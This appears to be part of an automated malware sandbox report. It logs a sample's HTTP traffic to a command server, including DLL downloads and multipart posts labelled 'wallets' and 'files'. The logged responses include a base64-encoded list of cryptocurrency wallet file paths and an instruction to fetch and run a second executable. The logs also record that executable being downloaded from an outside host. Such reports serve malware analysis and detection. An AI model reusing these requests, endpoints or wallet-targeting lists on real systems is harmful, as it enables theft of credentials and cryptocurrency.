00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Nov 10, 2024 04:55:24.127610922 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 10, 2024 04:55:24.407607079 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:24 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Nov 10, 2024 04:55:24.711133957 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 10, 2024 04:55:24.990892887 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:24 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Nov 10, 2024 04:55:26.357786894 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 10, 2024 04:55:26.639194965 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:26 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Nov 10, 2024 04:55:26.885080099 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 10, 2024 04:55:27.164999962 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:27 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Nov 10, 2024 04:55:27.875475883 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Nov 10, 2024 04:55:28.652780056 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 10, 2024 04:55:28.720155001 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECFHCGHJDBFIIDGDHIJD Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 2d 2d 0d 0a Data Ascii: ------ECFHCGHJDBFIIDGDHIJDContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------ECFHCGHJDBFIIDGDHIJDContent-Disposition: form-data; name="message"wallets------ECFHCGHJDBFIIDGDHIJD--
Nov 10, 2024 04:55:29.002343893 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:28 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Nov 10, 2024 04:55:29.007215023 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFH Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 2d 2d 0d 0a Data Ascii: ------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="message"files------BKKKEGIDBGHIDGDHDBFH--
Nov 10, 2024 04:55:29.291822910 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 10, 2024 04:55:29.338610888 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKF Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="file"------HCFIJKKKKKFCAAAAFBKF--
Nov 10, 2024 04:55:30.113142014 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 10, 2024 04:55:30.153697968 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBAEHCGHIIIDHIECFHJD Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 2d 2d 0d 0a Data Ascii: ------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="message"ybncbhylepme------DBAEHCGHIIIDHIECFHJD--
Nov 10, 2024 04:55:30.435645103 CET	271	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=
Nov 10, 2024 04:55:33.688595057 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBKKEGDBFIIEBFHIEHC Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 2d 2d 0d 0a Data Ascii: ------JEBKKEGDBFIIEBFHIEHCContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------JEBKKEGDBFIIEBFHIEHCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JEBKKEGDBFIIEBFHIEHC--
Nov 10, 2024 04:55:34.469521046 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49905	185.215.113.16	80	1868	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:55:30.445219994 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Nov 10, 2024 04:55:31.346040010 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:55:31 GMT Content-Type: application/octet-stream Content-Length: 3258368 Last-Modified: Sun, 10 Nov 2024 03:45:43 GMT Connection: keep-alive ETag: "67302c67-31b800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 c0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf1@12@Wk1l1 @.rsrc@.idata @brbzgqah+*@rlxxbpej11@.taggant01"1@
Nov 10, 2024 04:55:31.346116066 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:55:31.346126080 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:55:31.346134901 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:55:31.346146107 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
